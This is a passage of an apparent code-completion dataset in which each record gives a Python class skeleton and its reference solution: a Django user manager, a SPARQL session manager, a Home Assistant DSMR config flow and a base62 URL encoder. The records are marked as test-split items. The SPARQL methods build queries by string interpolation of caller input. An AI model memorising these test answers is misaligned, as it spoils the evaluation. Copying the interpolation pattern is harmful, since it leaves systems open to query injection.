"stack_v2_sparse_classes_30k_train_001381", "prompt": "Implement the Python class `MyUserManager` described below.\n\nClass description:\nImplement the MyUserManager class.\n\nMethod signatures and docstrings:\n- def create_user(self, username, email, password=None): Creates and saves a User with the given email, date of birth and password.\n- def create_superuser(self, username, email, password): Creates and saves a superuser with the given email, date of birth and password.", "prompted_full_text": "Implement the Python class `MyUserManager` described below.\n\nClass description:\nImplement the MyUserManager class.\n\nMethod signatures and docstrings:\n- def create_user(self, username, email, password=None): Creates and saves a User with the given email, date of birth and password.\n- def 
create_superuser(self, username, email, password): Creates and saves a superuser with the given email, date of birth and password.\n\n<|skeleton|>\nclass MyUserManager:\n\n def create_user(self, username, email, password=None):\n \"\"\"Creates and saves a User with the given email, date of birth and password.\"\"\"\n <|body_0|>\n\n def create_superuser(self, username, email, password):\n \"\"\"Creates and saves a superuser with the given email, date of birth and password.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not email:\n raise ValueError('Users must have an email address')\n user = self.model(username=username, email=self.normalize_email(email))\n user.set_password(password)\n user.save(using=self._db)\n return user\n<|end_body_0|>\n\n<|body_start_1|>\n user = self.create_user(username, email, password=password)\n user.is_admin = True\n user.is_staff = True\n user.save(using=self._db)\n return user\n<|end_body_1|>\n", "revision_id": "8b33a29e60d84853f8c1e92d7a4ca88c6ee349b4", "skeleton": "<|skeleton|>\nclass MyUserManager:\n\n def create_user(self, username, email, password=None):\n \"\"\"Creates and saves a User with the given email, date of birth and password.\"\"\"\n <|body_0|>\n\n def create_superuser(self, username, email, password):\n \"\"\"Creates and saves a superuser with the given email, date of birth and password.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MyUserManager:\n def create_user(self, username, email, password=None):\n \"\"\"Creates and saves a User with the given email, date of birth and password.\"\"\"\n if not email:\n raise ValueError('Users must have an email address')\n user = self.model(username=username, email=self.normalize_email(email))\n user.set_password(password)\n user.save(using=self._db)\n return user\n\n def create_superuser(self, username, email, password):\n \"\"\"Creates and saves a superuser with the given email, date of birth and password.\"\"\"\n user = self.create_user(username, email, password=password)\n user.is_admin = True\n user.is_staff = True\n user.save(using=self._db)\n return user\n", "source": "the_stack_v2_python_sparse", "source_path": "accounts/models.py", "source_repo": "falbellaihi1/BST", "split": "test", "star_events_count": 0} {"blob_id": "6dd2f875f220e3008c6bff830e65360b19e64c55", "bodies": ["sparql_results = self.query('\\n select distinct ?rs ?session ?name ?number ?pid ?sitename\\n where {\\n \\n ?rs rdf:type austalk:RecordedSession .\\n ?rs olac:speaker ?participant .\\n \\n ?participant austalk:id ?pid .\\n ?participant austalk:recording_site ?site .\\n ?site rdfs:label ?sitename .\\n \\n ?rs austalk:prototype ?session .\\n ?session austalk:name ?name .\\n ?session austalk:id ?number .\\n }\\n ORDER BY ?name')\nresults = []\nfor result in sparql_results['results']['bindings']:\n results.append(Session(client=self.client, identifier=result['rs']['value'], prototype=result['session']['value'], name=result['name']['value'], number=result['number']['value'], site=result['sitename']['value'], participantId=result['pid']['value']))\nreturn results", "sparql_results = self.query('\\n select distinct ?rs ?session ?name ?number ?pid ?sitename\\n where {\\n BIND (<%s> AS ?participant)\\n \\n ?rs rdf:type austalk:RecordedSession .\\n ?rs olac:speaker ?participant .\\n \\n ?participant austalk:id ?pid .\\n ?participant austalk:recording_site ?site .\\n ?site rdfs:label ?sitename .\\n 
\\n ?rs austalk:prototype ?session .\\n ?session austalk:name ?name .\\n ?session austalk:id ?number .\\n }\\n ORDER BY ?name' % participant.identifier)\nresults = []\nfor result in sparql_results['results']['bindings']:\n results.append(Session(client=self.client, identifier=result['rs']['value'], prototype=result['session']['value'], name=result['name']['value'], number=result['number']['value'], site=result['sitename']['value'], participantId=result['pid']['value']))\nreturn results", "sparql_results = self.query('\\n select distinct ?rs ?session ?name ?number ?pid\\n WHERE {\\n ?rs rdf:type austalk:RecordedSession .\\n ?rs olac:speaker ?participant .\\n \\n ?participant austalk:id ?pid .\\n ?participant austalk:recording_site ?site .\\n ?site rdfs:label \"%s\" .\\n \\n ?rs austalk:prototype ?session .\\n ?session austalk:name ?name .\\n ?session austalk:id ?number .\\n \\n }\\n ORDER BY ?name' % label)\nresults = []\nfor result in sparql_results['results']['bindings']:\n results.append(Session(client=self.client, identifier=result['rs']['value'], prototype=result['session']['value'], name=result['name']['value'], number=result['number']['value'], participantId=result['pid']['value']))\nreturn results"], "bodies_text": "<|body_start_0|>\n sparql_results = self.query('\\n select distinct ?rs ?session ?name ?number ?pid ?sitename\\n where {\\n \\n ?rs rdf:type austalk:RecordedSession .\\n ?rs olac:speaker ?participant .\\n \\n ?participant austalk:id ?pid .\\n ?participant austalk:recording_site ?site .\\n ?site rdfs:label ?sitename .\\n \\n ?rs austalk:prototype ?session .\\n ?session austalk:name ?name .\\n ?session austalk:id ?number .\\n }\\n ORDER BY ?name')\n results = []\n for result in sparql_results['results']['bindings']:\n results.append(Session(client=self.client, identifier=result['rs']['value'], prototype=result['session']['value'], name=result['name']['value'], number=result['number']['value'], site=result['sitename']['value'], participantId=result['pid']['value']))\n return results\n<|end_body_0|>\n\n<|body_start_1|>\n sparql_results = self.query('\\n select distinct ?rs ?session ?name ?number ?pid ?sitename\\n where {\\n BIND (<%s> AS ?participant)\\n \\n ?rs rdf:type austalk:RecordedSession .\\n ?rs olac:speaker ?participant .\\n \\n ?participant austalk:id ?pid .\\n ?participant austalk:recording_site ?site .\\n ?site rdfs:label ?sitename .\\n \\n ?rs austalk:prototype ?session .\\n ?session austalk:name ?name .\\n ?session austalk:id ?number .\\n }\\n ORDER BY ?name' % participant.identifier)\n results = []\n for result in sparql_results['results']['bindings']:\n results.append(Session(client=self.client, identifier=result['rs']['value'], prototype=result['session']['value'], name=result['name']['value'], number=result['number']['value'], site=result['sitename']['value'], participantId=result['pid']['value']))\n return results\n<|end_body_1|>\n\n<|body_start_2|>\n sparql_results = self.query('\\n select distinct ?rs ?session ?name ?number ?pid\\n WHERE {\\n ?rs rdf:type austalk:RecordedSession .\\n ?rs olac:speaker ?participant .\\n \\n ?participant austalk:id ?pid .\\n ?participant austalk:recording_site ?site .\\n ?site rdfs:label \"%s\" .\\n \\n ?rs austalk:prototype ?session .\\n ?session austalk:name ?name .\\n ?session austalk:id ?number .\\n \\n }\\n ORDER BY ?name' % label)\n results = []\n for result in sparql_results['results']['bindings']:\n results.append(Session(client=self.client, identifier=result['rs']['value'], prototype=result['session']['value'], 
name=result['name']['value'], number=result['number']['value'], participantId=result['pid']['value']))\n return results\n<|end_body_2|>\n", "class_docstring": "A session is a logical representation of the actual recording session which takes place at a particular location.", "class_name": "SessionManager", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SessionManager:\n \"\"\"A session is a logical representation of the actual recording session which takes place at a particular location.\"\"\"\n\n def all(self):\n \"\"\"Returns all the session names\"\"\"\n <|body_0|>\n\n def filter_by_participant(self, participant):\n \"\"\"Returns all the session names for a participant\"\"\"\n <|body_1|>\n\n def filter_by_site(self, label):\n \"\"\"Returns all the session names for a site identified by site label\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n sparql_results = self.query('\\n select distinct ?rs ?session ?name ?number ?pid ?sitename\\n where {\\n \\n ?rs rdf:type austalk:RecordedSession .\\n ?rs olac:speaker ?participant .\\n \\n ?participant austalk:id ?pid .\\n ?participant austalk:recording_site ?site .\\n ?site rdfs:label ?sitename .\\n \\n ?rs austalk:prototype ?session .\\n ?session austalk:name ?name .\\n ?session austalk:id ?number .\\n }\\n ORDER BY ?name')\n results = []\n for result in sparql_results['results']['bindings']:\n results.append(Session(client=self.client, identifier=result['rs']['value'], prototype=result['session']['value'], name=result['name']['value'], number=result['number']['value'], site=result['sitename']['value'], participantId=result['pid']['value']))\n return results\n<|end_body_0|>\n\n<|body_start_1|>\n sparql_results = self.query('\\n select distinct ?rs ?session ?name ?number ?pid ?sitename\\n where {\\n BIND (<%s> AS ?participant)\\n \\n ?rs rdf:type austalk:RecordedSession .\\n ?rs olac:speaker ?participant .\\n \\n ?participant austalk:id ?pid .\\n ?participant austalk:recording_site ?site .\\n ?site rdfs:label ?sitename .\\n \\n ?rs austalk:prototype ?session .\\n ?session austalk:name ?name .\\n ?session austalk:id ?number .\\n }\\n ORDER BY ?name' % participant.identifier)\n results = []\n for result in sparql_results['results']['bindings']:\n results.append(Session(client=self.client, identifier=result['rs']['value'], prototype=result['session']['value'], name=result['name']['value'], number=result['number']['value'], site=result['sitename']['value'], participantId=result['pid']['value']))\n return results\n<|end_body_1|>\n\n<|body_start_2|>\n sparql_results = self.query('\\n select distinct ?rs ?session ?name ?number ?pid\\n WHERE {\\n ?rs rdf:type austalk:RecordedSession .\\n ?rs olac:speaker ?participant .\\n \\n ?participant austalk:id ?pid .\\n ?participant austalk:recording_site ?site .\\n ?site rdfs:label \"%s\" .\\n \\n ?rs austalk:prototype ?session .\\n ?session austalk:name ?name .\\n ?session austalk:id ?number .\\n \\n }\\n ORDER BY ?name' % label)\n results = []\n for result in sparql_results['results']['bindings']:\n results.append(Session(client=self.client, identifier=result['rs']['value'], prototype=result['session']['value'], name=result['name']['value'], number=result['number']['value'], participantId=result['pid']['value']))\n return results\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000421", "length_bytes": 5176, "license_type": "no_license", "methods": [{"docstring": "Returns all the session names", "name": "all", 
"signature": "def all(self)"}, {"docstring": "Returns all the session names for a participant", "name": "filter_by_participant", "signature": "def filter_by_participant(self, participant)"}, {"docstring": "Returns all the session names for a site identified by site label", "name": "filter_by_site", "signature": "def filter_by_site(self, label)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005626", "prompt": "Implement the Python class `SessionManager` described below.\n\nClass description:\nA session is a logical representation of the actual recording session which takes place at a particular location.\n\nMethod signatures and docstrings:\n- def all(self): Returns all the session names\n- def filter_by_participant(self, participant): Returns all the session names for a participant\n- def filter_by_site(self, label): Returns all the session names for a site identified by site label", "prompted_full_text": "Implement the Python class `SessionManager` described below.\n\nClass description:\nA session is a logical representation of the actual recording session which takes place at a particular location.\n\nMethod signatures and docstrings:\n- def all(self): Returns all the session names\n- def filter_by_participant(self, participant): Returns all the session names for a participant\n- def filter_by_site(self, label): Returns all the session names for a site identified by site label\n\n<|skeleton|>\nclass SessionManager:\n \"\"\"A session is a logical representation of the actual recording session which takes place at a particular location.\"\"\"\n\n def all(self):\n \"\"\"Returns all the session names\"\"\"\n <|body_0|>\n\n def filter_by_participant(self, participant):\n \"\"\"Returns all the session names for a participant\"\"\"\n <|body_1|>\n\n def filter_by_site(self, label):\n \"\"\"Returns all the session names for a site identified by site label\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n sparql_results = self.query('\\n select distinct ?rs ?session ?name ?number ?pid ?sitename\\n where {\\n \\n ?rs rdf:type austalk:RecordedSession .\\n ?rs olac:speaker ?participant .\\n \\n ?participant austalk:id ?pid .\\n ?participant austalk:recording_site ?site .\\n ?site rdfs:label ?sitename .\\n \\n ?rs austalk:prototype ?session .\\n ?session austalk:name ?name .\\n ?session austalk:id ?number .\\n }\\n ORDER BY ?name')\n results = []\n for result in sparql_results['results']['bindings']:\n results.append(Session(client=self.client, identifier=result['rs']['value'], prototype=result['session']['value'], name=result['name']['value'], number=result['number']['value'], site=result['sitename']['value'], participantId=result['pid']['value']))\n return results\n<|end_body_0|>\n\n<|body_start_1|>\n sparql_results = self.query('\\n select distinct ?rs ?session ?name ?number ?pid ?sitename\\n where {\\n BIND (<%s> AS ?participant)\\n \\n ?rs rdf:type austalk:RecordedSession .\\n ?rs olac:speaker ?participant .\\n \\n ?participant austalk:id ?pid .\\n ?participant austalk:recording_site ?site .\\n ?site rdfs:label ?sitename .\\n \\n ?rs austalk:prototype ?session .\\n ?session austalk:name ?name .\\n ?session austalk:id ?number .\\n }\\n ORDER BY ?name' % participant.identifier)\n results = []\n for result in sparql_results['results']['bindings']:\n results.append(Session(client=self.client, identifier=result['rs']['value'], prototype=result['session']['value'], name=result['name']['value'], number=result['number']['value'], site=result['sitename']['value'], 
participantId=result['pid']['value']))\n return results\n<|end_body_1|>\n\n<|body_start_2|>\n sparql_results = self.query('\\n select distinct ?rs ?session ?name ?number ?pid\\n WHERE {\\n ?rs rdf:type austalk:RecordedSession .\\n ?rs olac:speaker ?participant .\\n \\n ?participant austalk:id ?pid .\\n ?participant austalk:recording_site ?site .\\n ?site rdfs:label \"%s\" .\\n \\n ?rs austalk:prototype ?session .\\n ?session austalk:name ?name .\\n ?session austalk:id ?number .\\n \\n }\\n ORDER BY ?name' % label)\n results = []\n for result in sparql_results['results']['bindings']:\n results.append(Session(client=self.client, identifier=result['rs']['value'], prototype=result['session']['value'], name=result['name']['value'], number=result['number']['value'], participantId=result['pid']['value']))\n return results\n<|end_body_2|>\n", "revision_id": "88000a79f0a18c92de0092814de3dbb2409f5515", "skeleton": "<|skeleton|>\nclass SessionManager:\n \"\"\"A session is a logical representation of the actual recording session which takes place at a particular location.\"\"\"\n\n def all(self):\n \"\"\"Returns all the session names\"\"\"\n <|body_0|>\n\n def filter_by_participant(self, participant):\n \"\"\"Returns all the session names for a participant\"\"\"\n <|body_1|>\n\n def filter_by_site(self, label):\n \"\"\"Returns all the session names for a site identified by site label\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SessionManager:\n \"\"\"A session is a logical representation of the actual recording session which takes place at a particular location.\"\"\"\n\n def all(self):\n \"\"\"Returns all the session names\"\"\"\n sparql_results = self.query('\\n select distinct ?rs ?session ?name ?number ?pid ?sitename\\n where {\\n \\n ?rs rdf:type austalk:RecordedSession .\\n ?rs olac:speaker ?participant .\\n \\n ?participant austalk:id ?pid .\\n ?participant austalk:recording_site ?site .\\n ?site rdfs:label ?sitename .\\n \\n ?rs austalk:prototype ?session .\\n ?session austalk:name ?name .\\n ?session austalk:id ?number .\\n }\\n ORDER BY ?name')\n results = []\n for result in sparql_results['results']['bindings']:\n results.append(Session(client=self.client, identifier=result['rs']['value'], prototype=result['session']['value'], name=result['name']['value'], number=result['number']['value'], site=result['sitename']['value'], participantId=result['pid']['value']))\n return results\n\n def filter_by_participant(self, participant):\n \"\"\"Returns all the session names for a participant\"\"\"\n sparql_results = self.query('\\n select distinct ?rs ?session ?name ?number ?pid ?sitename\\n where {\\n BIND (<%s> AS ?participant)\\n \\n ?rs rdf:type austalk:RecordedSession .\\n ?rs olac:speaker ?participant .\\n \\n ?participant austalk:id ?pid .\\n ?participant austalk:recording_site ?site .\\n ?site rdfs:label ?sitename .\\n \\n ?rs austalk:prototype ?session .\\n ?session austalk:name ?name .\\n ?session austalk:id ?number .\\n }\\n ORDER BY ?name' % participant.identifier)\n results = []\n for result in sparql_results['results']['bindings']:\n results.append(Session(client=self.client, identifier=result['rs']['value'], prototype=result['session']['value'], name=result['name']['value'], number=result['number']['value'], site=result['sitename']['value'], participantId=result['pid']['value']))\n return results\n\n def filter_by_site(self, label):\n \"\"\"Returns all the session 
names for a site identified by site label\"\"\"\n sparql_results = self.query('\\n select distinct ?rs ?session ?name ?number ?pid\\n WHERE {\\n ?rs rdf:type austalk:RecordedSession .\\n ?rs olac:speaker ?participant .\\n \\n ?participant austalk:id ?pid .\\n ?participant austalk:recording_site ?site .\\n ?site rdfs:label \"%s\" .\\n \\n ?rs austalk:prototype ?session .\\n ?session austalk:name ?name .\\n ?session austalk:id ?number .\\n \\n }\\n ORDER BY ?name' % label)\n results = []\n for result in sparql_results['results']['bindings']:\n results.append(Session(client=self.client, identifier=result['rs']['value'], prototype=result['session']['value'], name=result['name']['value'], number=result['number']['value'], participantId=result['pid']['value']))\n return results\n", "source": "the_stack_v2_python_sparse", "source_path": "browse/modelspackage/sessions.py", "source_repo": "Alveo/smallasc", "split": "test", "star_events_count": 0} {"blob_id": "0f645ee91782f286c68d418dd060752e7354a76d", "bodies": ["for entry in self._async_current_entries():\n if entry.data.get(CONF_HOST) == host and entry.data[CONF_PORT] == port:\n if updates is not None:\n changed = self.hass.config_entries.async_update_entry(entry, data={**entry.data, **updates})\n if changed and reload_on_update and (entry.state in (config_entries.ENTRY_STATE_LOADED, config_entries.ENTRY_STATE_SETUP_RETRY)):\n self.hass.async_create_task(self.hass.config_entries.async_reload(entry.entry_id))\n return self.async_abort(reason='already_configured')\nreturn None", "host = import_config.get(CONF_HOST)\nport = import_config[CONF_PORT]\nstatus = self._abort_if_host_port_configured(port, host, import_config)\nif status is not None:\n return status\ntry:\n info = await _validate_dsmr_connection(self.hass, import_config)\nexcept CannotConnect:\n return self.async_abort(reason='cannot_connect')\nexcept CannotCommunicate:\n return self.async_abort(reason='cannot_communicate')\nif host is not None:\n name = f'{host}:{port}'\nelse:\n name = port\ndata = {**import_config, **info}\nawait self.async_set_unique_id(info[CONF_SERIAL_ID])\nself._abort_if_unique_id_configured(data)\nreturn self.async_create_entry(title=name, data=data)"], "bodies_text": "<|body_start_0|>\n for entry in self._async_current_entries():\n if entry.data.get(CONF_HOST) == host and entry.data[CONF_PORT] == port:\n if updates is not None:\n changed = self.hass.config_entries.async_update_entry(entry, data={**entry.data, **updates})\n if changed and reload_on_update and (entry.state in (config_entries.ENTRY_STATE_LOADED, config_entries.ENTRY_STATE_SETUP_RETRY)):\n self.hass.async_create_task(self.hass.config_entries.async_reload(entry.entry_id))\n return self.async_abort(reason='already_configured')\n return None\n<|end_body_0|>\n\n<|body_start_1|>\n host = import_config.get(CONF_HOST)\n port = import_config[CONF_PORT]\n status = self._abort_if_host_port_configured(port, host, import_config)\n if status is not None:\n return status\n try:\n info = await _validate_dsmr_connection(self.hass, import_config)\n except CannotConnect:\n return self.async_abort(reason='cannot_connect')\n except CannotCommunicate:\n return self.async_abort(reason='cannot_communicate')\n if host is not None:\n name = f'{host}:{port}'\n else:\n name = port\n data = {**import_config, **info}\n await self.async_set_unique_id(info[CONF_SERIAL_ID])\n self._abort_if_unique_id_configured(data)\n return self.async_create_entry(title=name, data=data)\n<|end_body_1|>\n", "class_docstring": "Handle a config flow 
for DSMR.", "class_name": "DSMRFlowHandler", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DSMRFlowHandler:\n \"\"\"Handle a config flow for DSMR.\"\"\"\n\n def _abort_if_host_port_configured(self, port: str, host: str=None, updates: Optional[Dict[Any, Any]]=None, reload_on_update: bool=True):\n \"\"\"Test if host and port are already configured.\"\"\"\n <|body_0|>\n\n async def async_step_import(self, import_config=None):\n \"\"\"Handle the initial step.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n for entry in self._async_current_entries():\n if entry.data.get(CONF_HOST) == host and entry.data[CONF_PORT] == port:\n if updates is not None:\n changed = self.hass.config_entries.async_update_entry(entry, data={**entry.data, **updates})\n if changed and reload_on_update and (entry.state in (config_entries.ENTRY_STATE_LOADED, config_entries.ENTRY_STATE_SETUP_RETRY)):\n self.hass.async_create_task(self.hass.config_entries.async_reload(entry.entry_id))\n return self.async_abort(reason='already_configured')\n return None\n<|end_body_0|>\n\n<|body_start_1|>\n host = import_config.get(CONF_HOST)\n port = import_config[CONF_PORT]\n status = self._abort_if_host_port_configured(port, host, import_config)\n if status is not None:\n return status\n try:\n info = await _validate_dsmr_connection(self.hass, import_config)\n except CannotConnect:\n return self.async_abort(reason='cannot_connect')\n except CannotCommunicate:\n return self.async_abort(reason='cannot_communicate')\n if host is not None:\n name = f'{host}:{port}'\n else:\n name = port\n data = {**import_config, **info}\n await self.async_set_unique_id(info[CONF_SERIAL_ID])\n self._abort_if_unique_id_configured(data)\n return self.async_create_entry(title=name, data=data)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000422", "length_bytes": 6055, "license_type": "permissive", "methods": [{"docstring": "Test if host and port are already configured.", "name": "_abort_if_host_port_configured", "signature": "def _abort_if_host_port_configured(self, port: str, host: str=None, updates: Optional[Dict[Any, Any]]=None, reload_on_update: bool=True)"}, {"docstring": "Handle the initial step.", "name": "async_step_import", "signature": "async def async_step_import(self, import_config=None)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001695", "prompt": "Implement the Python class `DSMRFlowHandler` described below.\n\nClass description:\nHandle a config flow for DSMR.\n\nMethod signatures and docstrings:\n- def _abort_if_host_port_configured(self, port: str, host: str=None, updates: Optional[Dict[Any, Any]]=None, reload_on_update: bool=True): Test if host and port are already configured.\n- async def async_step_import(self, import_config=None): Handle the initial step.", "prompted_full_text": "Implement the Python class `DSMRFlowHandler` described below.\n\nClass description:\nHandle a config flow for DSMR.\n\nMethod signatures and docstrings:\n- def _abort_if_host_port_configured(self, port: str, host: str=None, updates: Optional[Dict[Any, Any]]=None, reload_on_update: bool=True): Test if host and port are already configured.\n- async def async_step_import(self, import_config=None): Handle the initial step.\n\n<|skeleton|>\nclass DSMRFlowHandler:\n \"\"\"Handle a config flow for DSMR.\"\"\"\n\n def _abort_if_host_port_configured(self, port: str, host: str=None, updates: Optional[Dict[Any, Any]]=None, reload_on_update: 
bool=True):\n \"\"\"Test if host and port are already configured.\"\"\"\n <|body_0|>\n\n async def async_step_import(self, import_config=None):\n \"\"\"Handle the initial step.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n for entry in self._async_current_entries():\n if entry.data.get(CONF_HOST) == host and entry.data[CONF_PORT] == port:\n if updates is not None:\n changed = self.hass.config_entries.async_update_entry(entry, data={**entry.data, **updates})\n if changed and reload_on_update and (entry.state in (config_entries.ENTRY_STATE_LOADED, config_entries.ENTRY_STATE_SETUP_RETRY)):\n self.hass.async_create_task(self.hass.config_entries.async_reload(entry.entry_id))\n return self.async_abort(reason='already_configured')\n return None\n<|end_body_0|>\n\n<|body_start_1|>\n host = import_config.get(CONF_HOST)\n port = import_config[CONF_PORT]\n status = self._abort_if_host_port_configured(port, host, import_config)\n if status is not None:\n return status\n try:\n info = await _validate_dsmr_connection(self.hass, import_config)\n except CannotConnect:\n return self.async_abort(reason='cannot_connect')\n except CannotCommunicate:\n return self.async_abort(reason='cannot_communicate')\n if host is not None:\n name = f'{host}:{port}'\n else:\n name = port\n data = {**import_config, **info}\n await self.async_set_unique_id(info[CONF_SERIAL_ID])\n self._abort_if_unique_id_configured(data)\n return self.async_create_entry(title=name, data=data)\n<|end_body_1|>\n", "revision_id": "ed4ab403deaed9e8c95e0db728477fcb012bf4fa", "skeleton": "<|skeleton|>\nclass DSMRFlowHandler:\n \"\"\"Handle a config flow for DSMR.\"\"\"\n\n def _abort_if_host_port_configured(self, port: str, host: str=None, updates: Optional[Dict[Any, Any]]=None, reload_on_update: bool=True):\n \"\"\"Test if host and port are already configured.\"\"\"\n <|body_0|>\n\n async def async_step_import(self, import_config=None):\n \"\"\"Handle the initial step.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DSMRFlowHandler:\n \"\"\"Handle a config flow for DSMR.\"\"\"\n\n def _abort_if_host_port_configured(self, port: str, host: str=None, updates: Optional[Dict[Any, Any]]=None, reload_on_update: bool=True):\n \"\"\"Test if host and port are already configured.\"\"\"\n for entry in self._async_current_entries():\n if entry.data.get(CONF_HOST) == host and entry.data[CONF_PORT] == port:\n if updates is not None:\n changed = self.hass.config_entries.async_update_entry(entry, data={**entry.data, **updates})\n if changed and reload_on_update and (entry.state in (config_entries.ENTRY_STATE_LOADED, config_entries.ENTRY_STATE_SETUP_RETRY)):\n self.hass.async_create_task(self.hass.config_entries.async_reload(entry.entry_id))\n return self.async_abort(reason='already_configured')\n return None\n\n async def async_step_import(self, import_config=None):\n \"\"\"Handle the initial step.\"\"\"\n host = import_config.get(CONF_HOST)\n port = import_config[CONF_PORT]\n status = self._abort_if_host_port_configured(port, host, import_config)\n if status is not None:\n return status\n try:\n info = await _validate_dsmr_connection(self.hass, import_config)\n except CannotConnect:\n return self.async_abort(reason='cannot_connect')\n except CannotCommunicate:\n return self.async_abort(reason='cannot_communicate')\n if host is not None:\n name = f'{host}:{port}'\n else:\n name = port\n data = {**import_config, **info}\n await 
self.async_set_unique_id(info[CONF_SERIAL_ID])\n self._abort_if_unique_id_configured(data)\n return self.async_create_entry(title=name, data=data)\n", "source": "the_stack_v2_python_sparse", "source_path": "homeassistant/components/dsmr/config_flow.py", "source_repo": "tchellomello/home-assistant", "split": "test", "star_events_count": 8} {"blob_id": "53876b10f480090c654039d6966eed9867e3ff91", "bodies": ["if num == 0:\n return alphabet[0]\narr = []\narr_append = arr.append\n_divmod = divmod\nbase = len(alphabet)\nwhile num:\n num, rem = _divmod(num, base)\n arr_append(alphabet[rem])\narr.reverse()\nreturn ''.join(arr)", "base = len(alphabet)\nstrlen = len(string)\nnum = 0\nidx = 0\nfor char in string:\n power = strlen - (idx + 1)\n num += alphabet.index(char) * base ** power\n idx += 1\nreturn num"], "bodies_text": "<|body_start_0|>\n if num == 0:\n return alphabet[0]\n arr = []\n arr_append = arr.append\n _divmod = divmod\n base = len(alphabet)\n while num:\n num, rem = _divmod(num, base)\n arr_append(alphabet[rem])\n arr.reverse()\n return ''.join(arr)\n<|end_body_0|>\n\n<|body_start_1|>\n base = len(alphabet)\n strlen = len(string)\n num = 0\n idx = 0\n for char in string:\n power = strlen - (idx + 1)\n num += alphabet.index(char) * base ** power\n idx += 1\n return num\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def idToShortURL(self, num: int, alphabet: str=BASE62) -> str:\n \"\"\"Encode a positive number into Base X and return the string. Arguments: - `num`: The number to encode - `alphabet`: The alphabet to use for encoding\"\"\"\n <|body_0|>\n\n def shortURLToId(self, string: str, alphabet: str=BASE62) -> int:\n \"\"\"Decode a Base X encoded string into the number Arguments: - `string`: The encoded string - `alphabet`: The alphabet to use for decoding\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if num == 0:\n return alphabet[0]\n arr = []\n arr_append = arr.append\n _divmod = divmod\n base = len(alphabet)\n while num:\n num, rem = _divmod(num, base)\n arr_append(alphabet[rem])\n arr.reverse()\n return ''.join(arr)\n<|end_body_0|>\n\n<|body_start_1|>\n base = len(alphabet)\n strlen = len(string)\n num = 0\n idx = 0\n for char in string:\n power = strlen - (idx + 1)\n num += alphabet.index(char) * base ** power\n idx += 1\n return num\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000423", "length_bytes": 5356, "license_type": "no_license", "methods": [{"docstring": "Encode a positive number into Base X and return the string. Arguments: - `num`: The number to encode - `alphabet`: The alphabet to use for encoding", "name": "idToShortURL", "signature": "def idToShortURL(self, num: int, alphabet: str=BASE62) -> str"}, {"docstring": "Decode a Base X encoded string into the number Arguments: - `string`: The encoded string - `alphabet`: The alphabet to use for decoding", "name": "shortURLToId", "signature": "def shortURLToId(self, string: str, alphabet: str=BASE62) -> int"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def idToShortURL(self, num: int, alphabet: str=BASE62) -> str: Encode a positive number into Base X and return the string. 
Arguments: - `num`: The number to encode - `alphabet`: The alphabet to use for encoding\n- def shortURLToId(self, string: str, alphabet: str=BASE62) -> int: Decode a Base X encoded string into the number Arguments: - `string`: The encoded string - `alphabet`: The alphabet to use for decoding", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def idToShortURL(self, num: int, alphabet: str=BASE62) -> str: Encode a positive number into Base X and return the string. Arguments: - `num`: The number to encode - `alphabet`: The alphabet to use for encoding\n- def shortURLToId(self, string: str, alphabet: str=BASE62) -> int: Decode a Base X encoded string into the number Arguments: - `string`: The encoded string - `alphabet`: The alphabet to use for decoding\n\n<|skeleton|>\nclass Solution:\n\n def idToShortURL(self, num: int, alphabet: str=BASE62) -> str:\n \"\"\"Encode a positive number into Base X and return the string. Arguments: - `num`: The number to encode - `alphabet`: The alphabet to use for encoding\"\"\"\n <|body_0|>\n\n def shortURLToId(self, string: str, alphabet: str=BASE62) -> int:\n \"\"\"Decode a Base X encoded string into the number Arguments: - `string`: The encoded string - `alphabet`: The alphabet to use for decoding\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if num == 0:\n return alphabet[0]\n arr = []\n arr_append = arr.append\n _divmod = divmod\n base = len(alphabet)\n while num:\n num, rem = _divmod(num, base)\n arr_append(alphabet[rem])\n arr.reverse()\n return ''.join(arr)\n<|end_body_0|>\n\n<|body_start_1|>\n base = len(alphabet)\n strlen = len(string)\n num = 0\n idx = 0\n for char in string:\n power = strlen - (idx + 1)\n num += alphabet.index(char) * base ** power\n idx += 1\n return num\n<|end_body_1|>\n", "revision_id": "f2621cd76822a922c49b60f32931f26cce1c571d", "skeleton": "<|skeleton|>\nclass Solution:\n\n def idToShortURL(self, num: int, alphabet: str=BASE62) -> str:\n \"\"\"Encode a positive number into Base X and return the string. Arguments: - `num`: The number to encode - `alphabet`: The alphabet to use for encoding\"\"\"\n <|body_0|>\n\n def shortURLToId(self, string: str, alphabet: str=BASE62) -> int:\n \"\"\"Decode a Base X encoded string into the number Arguments: - `string`: The encoded string - `alphabet`: The alphabet to use for 